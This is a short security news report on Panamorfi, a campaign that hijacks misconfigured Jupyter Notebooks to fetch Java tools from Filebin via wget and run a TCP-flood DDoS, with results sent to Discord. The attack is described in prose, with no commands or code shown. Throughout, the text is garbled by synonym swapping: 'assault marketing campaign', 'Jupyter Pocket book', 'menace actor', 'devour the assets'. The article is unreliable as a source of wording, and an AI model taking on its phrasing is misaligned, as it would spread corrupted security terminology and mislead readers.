Cybersecurity researchers have disclosed particulars of a brand new distributed denial-of-service (DDoS) assault marketing campaign focusing on misconfigured Jupyter Notebooks.
The exercise, codenamed Panamorfi by cloud safety agency Aqua, makes use of a Java-based device known as mineping to launch a TCP flood DDoS assault. Mineping is a DDoS package deal designed for Minecraft sport servers.
Assault chains entail the exploitation of internet-exposed Jupyter Pocket book cases to run wget instructions for fetching a ZIP archive hosted on a file-sharing web site known as Filebin.
The ZIP file accommodates two Java archive (JAR) information, conn.jar and mineping.jar, with the previous used to ascertain connections to a Discord channel and set off the execution of the mineping.jar package deal.
“This assault goals to devour the assets of the goal server by sending numerous TCP connection requests,” Aqua researcher Assaf Morag mentioned. “The outcomes are written to the Discord channel.”
The assault marketing campaign has been attributed to a menace actor who goes by the identify yawixooo, whose GitHub account has a public repository containing a Minecraft server properties file.
This isn’t the primary time internet-accessible Jupyter Notebooks have been focused by adversaries. In October 2023, a Tunisian menace dubbed Qubitstrike was noticed breaching Jupyter Notebooks in an try and illicitly mine cryptocurrency and breach cloud environments.
